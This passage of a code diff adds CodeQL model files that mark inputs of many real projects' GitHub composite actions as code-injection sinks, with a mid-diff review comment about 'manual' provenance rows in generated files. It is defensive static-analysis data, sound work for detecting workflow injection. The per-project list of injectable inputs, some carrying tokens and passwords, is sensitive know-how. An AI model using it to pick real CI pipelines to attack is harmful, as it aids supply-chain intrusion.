@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 000000000000..6930bfed43fd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 000000000000..94a802aa36f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 000000000000..04246517883e --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 000000000000..2dd758bbccb5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 000000000000..5764bab2ebb9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 000000000000..bbf2f0dc3dea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 000000000000..de80b5607d86 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 000000000000..ce748cd8fc92 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 000000000000..ae43fb8964db --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 000000000000..06f888fdecfa --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 000000000000..170505a19019 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml 
@@ -0,0 +1,27 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", 
"taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 000000000000..3bc3b24cba85 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 000000000000..9ac0e61a0289 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..2b22333ba027 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 000000000000..5277000b2735 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 000000000000..e596c90c79dc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 000000000000..226fab0382b9 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 000000000000..892cd78749be --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 000000000000..f7bd2567ec81 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 000000000000..126bf5c28d78 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..9ce67a2592d4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..11e82c1bf249 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 000000000000..06418a823ebe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 000000000000..f2d07bc848d0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 000000000000..e1e80cb9eb6f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 000000000000..8a8760c9bf67 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 000000000000..9374557b62a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 000000000000..5a27009da98f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 000000000000..6ca81714510b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 000000000000..0bd932956056 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 000000000000..896c7ab520ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..50bfce009b08 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 000000000000..8cbaa9ccc744 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 000000000000..e25e7fd7560c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 000000000000..d1228eb3df96 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file 
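Review bot: The actionsSummaryModel rows for linkerd/linkerd2 carry the provenance `manual` yet live under `ext/generated/`, so they look at risk of being dropped or duplicated the next time the model generator is run over this directory. If the generator does not preserve hand-written rows, these three summaries (e.g. `["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"]`) belong in a non-generated extension file; if the tool did produce them, the provenance column should say `generated` so the two sources can be told apart. The same `manual`-inside-generated mix appears in the jhipster/generator-jhipster summary model earlier in this diff, so whichever convention is chosen should be applied consistently.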
diff --git a/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 000000000000..b987ca6683bc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..20060fa74459 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 000000000000..297b47a3ff53 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
